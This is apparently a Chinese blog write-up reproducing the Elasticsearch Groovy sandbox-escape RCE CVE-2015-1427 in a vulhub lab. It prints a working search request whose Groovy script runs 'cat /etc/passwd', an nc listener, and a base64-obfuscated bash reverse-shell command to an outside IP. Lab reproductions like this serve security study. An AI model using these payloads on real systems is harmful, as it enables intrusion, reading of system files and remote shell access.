91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

發布時間:2021-12-16 18:27:55 來源:億速云 閱讀:709 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

Elasticsearch是一個基于Lucene的搜索服務器。它提供了一個分布式多用戶能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java語言開發的,并作為Apache許可條款下的開放源碼發布,是一種流行的企業級搜索引擎。

2014年爆出過一個遠程代碼執行漏洞(CVE-2014-3120),該漏洞產生原因是由于ElasticSearch使用的腳本引擎支持腳本代碼MVEL作為表達式進行數據操作,攻擊者可以通過MVEL構造執行任意java代碼。

后來腳本語言引擎換成了Groovy,并且加入了沙盒進行控制,危險的代碼會被攔截,結果這次由于沙盒限制的不嚴格,導致遠程代碼執行。

漏洞影響范圍:Elasticsearch 1.3.0-1.3.7 | 1.4.0-1.4.2

本文僅作漏洞復現記錄與實現,利用流程如下:

一、漏洞環境搭建

本文漏洞環境采用vulhub搭建,執行以下命令開啟環境

cd /elasticsearch/CVE-2015-1427

docker-compose build

docker-compose up -d

執行完畢后訪問9200端口,顯示如下:

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

漏洞鏈接:http://192.168.101.152:9200/

二、漏洞復現

利用該漏洞首先需要ElasticSearch存在至少一條數據,發送以下數據包添加數據

POST /website/blog/ HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 21

{
"name": "test"
}

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

返回201表示添加成功,然后發送以下數據包執行命令

POST /_search?pretty HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 410

{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

命令執行成功

為了方便將shell反彈至服務器上

服務器執行nc -lvvp 監聽端口

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

之后執行以下命令反彈shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==}|{base64,-d}|{bash,-i}

成功反彈

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現

以上就是如何分析ElasticSearch Groovy遠程代碼執行漏洞CVE-2015-1427復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

枣阳市| 秦皇岛市| 东阳市| 鄂州市| 祁门县| 交城县| 定兴县| 沾益县| 濉溪县| 小金县| 固阳县| 湘乡市| 吴忠市| 宿松县| 邵东县| 博白县| 石泉县| 汉沽区| 凌海市| 黎川县| 金乡县| 洛南县| 天峨县| 伊川县| 乐陵市| 安吉县| 古交市| 漾濞| 德江县| 洪雅县| 丹江口市| 茂名市| 许昌市| 巴青县| 平果县| 河南省| 五大连池市| 包头市| 汨罗市| 方山县| 沂水县|